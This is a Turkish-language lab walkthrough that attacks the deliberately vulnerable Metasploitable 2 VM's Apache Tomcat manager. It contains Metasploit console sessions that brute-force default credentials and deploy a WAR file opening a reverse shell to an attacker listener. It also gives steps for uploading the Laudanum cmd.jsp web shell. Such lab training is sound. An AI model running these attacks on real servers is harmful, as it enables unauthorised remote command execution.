Metasploitable 2 Exploit

Apache Tomcat/Coyote

Exploit #2 : Apache Tomcat/Coyote

nmap çıktısında

8180/tcp open  http              Apache Tomcat/Coyote JSP engine 1.1

satırı sistemde bir apache sunucusunun kurulu olduğunu gösteriyor. Nessus çıktısına bakıldığında ise sunucu arayüzüne kullanıcı adı ve parola olarak “tomcat” ile giriş yapılabileceğini söylüyor.

İlk olarak nmap çıktısında görülen bilgi kadarıyla metasploit kullanılarak sisteme sızılmaya çalışılacaktır.

Msfconsole da tomcat_mgr_login ile zayıf kullanıcı adı ve parolalar bulunmaya çalışılır.

msf> search tomcat login

 

Matching Modules

================

  Name                                  Disclosure Date  Rank Description

  —-                                  —————  —- ———–

  auxiliary/scanner/http/tomcat_mgr_login                normal  Tomcat Application Manager Login Utility

 

msf> use auxiliary/scanner/http/tomcat_mgr_login

msf auxiliary(tomcat_mgr_login) > show options

 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

 

  Name           Current Setting                                                            Required  Description

  —-           —————                                                            ——–  ———–

  BLANK_PASSWORDS   true                                                                       no     Try blank passwords for all users

  BRUTEFORCE_SPEED  5                                                                          yes    How fast to bruteforce, from 0 to 5

  PASSWORD                                                                                     no     A specific password to authenticate with

  PASS_FILE      /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_pass.txt   no     File containing passwords, one per line

  Proxies                                                                                      no     Use a proxy chain

  RHOSTS         172.16.52.133                                                              yes    The target address range or CIDR identifier

  RPORT          8180                                                                       yes    The target port

  STOP_ON_SUCCESS   false                                                                      yes    Stop guessing when a credential works for a host

  THREADS        1                                                                          yes    The number of concurrent threads

  URI            /manager/html                                                              yes    URI for Manager login. Default is /manager/html

  USERNAME                                                                                     no     A specific username to authenticate as

  USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_userpass.txt  no     File containing users and passwords separated by space, one pair per line

  USER_AS_PASS   true                                                                       no     Try the username as the password for all users

  USER_FILE      /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_users.txt no     File containing users, one per line

  VERBOSE        true                                                                       yes    Whether to print output for all attempts

  VHOST                                                                                        no     HTTP server virtual host

 

msf auxiliary(tomcat_mgr_login) > set RHOSTS 172.16.52.133

RHOSTS => 172.16.52.133

msf auxiliary(tomcat_mgr_login) > set RPORT 8180

RPORT => 8180

msf auxiliary(tomcat_mgr_login) > exploit

 

Burada metasploit bünyesinde barındırdığı bazı sık kullanılan kullanıcı adı  ve parolaları dener.

.

.

.

[*] 172.16.52.133:8180 TOMCAT_MGR – [16/63] – Trying username:’root’ with password:’root’

[-] 172.16.52.133:8180 TOMCAT_MGR – [16/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’

[*] 172.16.52.133:8180 TOMCAT_MGR – [17/63] – Trying username:’tomcat’ with password:’tomcat’

[+] http://172.16.52.133:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’

[*] 172.16.52.133:8180 TOMCAT_MGR – [18/63] – Trying username:’both’ with password:’both’

[-] 172.16.52.133:8180 TOMCAT_MGR – [18/63] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’

.

.

Metasploit başarıyla buldu. Şimdi tomcat’a eldeki kullanıcı adı ve parolayla login olunmaya çalışılır.

 

msf> search tomcat deploy

 

Matching Modules

================

 

  Name                               Disclosure Date       Rank    Description

  —-                               —————       —-    ———–

  exploit/multi/http/tomcat_mgr_deploy  2009-11-09 00:00:00 UTC  excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution

 

 

msf> use exploit/multi/http/tomcat_mgr_deploy

msf exploit(tomcat_mgr_deploy) > show options

 

Module options (exploit/multi/http/tomcat_mgr_deploy):

  Name   Current Setting  Required  Description

  —-   —————  ——–  ———–

  PASSWORD                no     The password for the specified username

  PATH   /manager/html/   yes    The URI path of the manager app (/deploy and /undeploy will be used)

  Proxies                 no     Use a proxy chain

  RHOST 172.16.52.133 yes    The target address

  RPORT 8180          yes    The target port

  USERNAME                no     The username to authenticate as

  VHOST                   no     HTTP server virtual host

 

 

Payload options (java/shell_reverse_tcp):

  Name   Current Setting  Required  Description

  —-   —————  ——–  ———–

  LHOST  172.16.52.128 yes    The listen address

  LPORT  4444          yes    The listen port

Exploit target:

  Id  Name

  —  —-

  0   Automatic

 

msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat

PASSWORD => tomcat

msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat

USERNAME => tomcat

msf exploit(tomcat_mgr_deploy) > set PATH /manager/html

PATH => /manager/html

 

Genelde apache server 80 veya 8080 portunda çalışır. Metasploitable da ise 8180. Tarayıcıdan

http://ip:port/manager/html (jsp dosyaları buradadır.)

http://ip:port/admin ile apache sunucusu arayüzüne ulaşılabilir.

 

msf exploit(tomcat_mgr_deploy) > exploit

 

[*] Started reverse handler on 172.16.52.128:4444

[*] Attempting to automatically select a target…

[-] Exploit failed [no-target]: Unable to automatically select a target

 

Burada alınan hata hedefin otomatik olarak seçilemediğinden bahsediyor. Bunun için hedefler listelenir (show targets) ve hedef seçilir (set TARGET 3)

 

msf exploit(tomcat_mgr_deploy) > show targets

 

Exploit targets:

 

  Id  Name

  —  —-

  0   Automatic

  1   Java Universal

  2   Windows Universal

  3   Linux x86

 

 

msf exploit(tomcat_mgr_deploy) > set TARGET 3

TARGET => 3

msf exploit(tomcat_mgr_deploy) > exploit

 

[*] Started reverse handler on 172.16.52.128:4444

[*] Using manually select target “Linux x86”

[*] Uploading 1716 bytes as A6FF1k5vtsLzmIPMK8l.war …

[*] Executing /A6FF1k5vtsLzmIPMK8l/lYdQLeF7j8BRyRhuAk.jsp…

[*] Undeploying A6FF1k5vtsLzmIPMK8l …

[*] Command shell session 4 opened (172.16.52.128:4444 -> 172.16.52.133:50500) at 2013-07-28 01:38:28 +0300

 

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

 

Sisteme başarıyla giriş yapıldı.

Not: set TARGET 3 dedikten sonra show payloads ile hedefe özel ilkinden farklı payloadlar listelenir.Meterpreter gibi daha fazla seçenek sunan bir payload kullanılabilir.

 

Nessus ise Apache servera tomcat kullanıcı adı ve parolayla login olunabileceğini direk söyler. http://172.16.52.133:8180/manager/html ile apache servera tarayıcı üzerinden login        olunabilir.

 

Bu arada uzaktan komut çalıştırmak için http://sourceforge.net/projects/laudanum/     linkinden indirilebilecek arşiv dosyası farklı ortamlar için (asp,php,jsp) shellcode çalıştırmaya yarar dosyalar içerir.

İndirilen dosya

# tar xzvf laudanum.tgz ile çalıştırılarak çıkarılır.  laudanum->jsp->cmd.war dosyası tarayıcıda WAR file  to deploy üzerinden upload edilir.

http://172.16.52.133:8180/manager/html adresinde /cmd görülebilir.

http://172.16.52.133:8180/cmd/cmd.jsp adresine gidilir ve istenilen komutlar çalıştırılabilir.

Sistemden çıkılırken /cmd undeploy edilir.